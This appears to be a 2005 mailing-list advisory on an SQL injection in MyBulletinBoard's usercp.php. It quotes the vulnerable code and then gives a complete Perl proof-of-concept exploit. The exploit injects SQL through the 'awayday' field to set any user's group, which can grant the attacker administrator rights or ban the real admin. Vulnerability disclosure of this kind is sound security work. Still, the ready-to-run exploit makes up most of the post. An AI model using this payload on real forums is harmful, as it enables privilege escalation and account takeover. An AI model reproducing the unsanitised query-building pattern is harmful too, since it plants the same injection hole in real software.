<<< Date Index >>>     <<< Thread Index >>>

SQL-Injection in MyBulletinBoard allows attacker to become a board admin.



Vendor:  www.mybboard.com
Version: 1.00 Preview Release 2, RC4 and mayb prior.
Script:  usercp.php
Code:
if($mybb->input['away'] == "yes" && $mybb->settings['allowaway'] != "no")
       {
    [...]
$returndate = $mybb->input['awayday']."-".$mybb->input['awaymonth']."-".$mybb->input['awayyear'];
    [...]
     $newprofile = array(
"website" => addslashes(htmlspecialchars($mybb->input['website'])),
              "icq" => intval($mybb->input['icq']),
              "aim" => addslashes(htmlspecialchars($mybb->input['aim'])),
"yahoo" => addslashes(htmlspecialchars($mybb->input['yahoo'])),
              "msn" => addslashes(htmlspecialchars($mybb->input['msn'])),
              "birthday" => $bday,
              "away" => $away,
              "awaydate" => $awaydate,
"returndate" => $returndate, // <--- not checked (bday too, but anyway) "awayreason" => addslashes(htmlspecialchars($mybb->input['awayreason']))
              );
    [...]
$db->update_query(TABLE_PREFIX."users", $newprofile, "uid='".$mybb->user['uid']."'");
So: Attacker can replace "awayday" param by some SQL code and change any field in _users table. Changing "usergroup" for his "uid" to 4 makes him an admin. To use this bug attacker have to be
    a registered/awayting_activation user.

Proof of concept: (For PR2 only)
--<-->--<-->--<-->--<-->--<-->--[START]--<-->--<-->--<-->--<-->--<-->--
#!/usr/bin/perl

###   MyBB Preview Release 2 SQL-Injection PoC ExPlOiT   ###
###   ------------------------------------------------   ###
###   To use this you have to be registered member on    ###
###   a target.                                          ###
###   ------------------------------------------------   ###
###   Glossary:                                          ###
###     [MYBBUSER] - name of the field in cookie;        ###
###     [YOUR_ID]  - your uid :)                         ###
###     [ID]       - victim uid                          ###
###   Available groups:                                  ###
###     1 - Unregistered / Not Logged In                 ###
###     2 - Registered                                   ###
###     3 - Super Moderators                             ###
###     4 - Administrators                               ###
###     5 - Awayting Activation                          ###
###     6 - Moderators                                   ###
###     7 - Banned                                       ###
###   ------------------------------------------------   ###
###   Examples:                                          ###
###    1) TROUBLE --> U need an admin privileges.        ###
###       USAGE --> mybbpr2.pl -u [MYBBUSER] -i          ###
###                 [YOUR_ID] -g 4 server /mybb/         ###
###    2) TROUBLE --> U need to ban real admin.          ###
###       USAGE --> mybbpr2.pl -u [MYBBUSER] -i          ###
###                 [ID] -g 7 server /mybb/              ###

use IO::Socket;

$tmp=0;

while($tmp<@ARGV)
{
 if($ARGV[$tmp] eq "-u")
  {
   $mbuser=$ARGV[$tmp+1];
   $tmp++;
  }
 if($ARGV[$tmp] eq "-i")
  {
   $id=$ARGV[$tmp+1];
   $tmp++;
  }
 if($ARGV[$tmp] eq "-g")
  {
   $ugr=$ARGV[$tmp+1];
   $tmp++;
  }
 if($ARGV[$tmp] eq "-h")
  {
   &f_help();
  }
 $tmp++;
}

$target=$ARGV[@ARGV-2];
$path  =$ARGV[@ARGV-1];

if(!$mbuser || !$id || !$ugr)
{
 &f_die("Some options aren't specified");
}
print "\r\n Attacking http://$target\r\n";;

$sock = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$target", PeerPort => "80") || &f_die("Can't connect to $target");
$str="bday1=&bday2=&bday3=&website=&fid3=Undisclosed&fid1=&fid2=&usertitle=&icq=&aim=&msn=&yahoo=&away=yes&awayreason=Hacking+The+World&awayday=1-1-2009%27%2C+usergroup=%27$ugr%27+WHERE+uid=%27$id%27+%2F%2A&awaymonth=1&awayyear=2009&action=do_profile&regsubmit=Update+Profile";

print $sock "POST $path/usercp.php HTTP/1.1\nHost: $target\nAccept: */*\nCookie: mybbuser=$mbuser\nConnection: close\nContent-Type: application/x-www-form-urlencoded\nContent-Length: ".length($str)."\n\n$str\n";
while(<$sock>)
{
if (/Thank you/i) { print "\r\n Looks like successfully exploited\r\n Just check it.\r\n"; exit(0)}
}
print "\r\n Looks like exploit failed :[\r\n";

#----------------------------------#
#   S  u  B  r  O  u  T  i  N  e   #
#----------------------------------#


sub f_help()
{
print q(
 Usage: mybbpr2.pl <OPTIONS> SERVER PATH
 Options:
  -u USERKEY        mybbuser field from cookie.
  -i UID            User's uid. (Change group 4 this user)
  -g GROUP          New usergroup. (1-7)
  -h                Displays this help.
  );
 exit(-1);
}
#'
sub f_die($)
{
 print "\r\nERROR: $_[0]\r\n";
 exit(-1);
}
--<-->--<-->--<-->--<-->--<-->--[EoF]--<-->--<-->--<-->--<-->--<-->--

Found: 1-3 sept 2005. Don't remember.
Updated package is available (i hope).

ByE.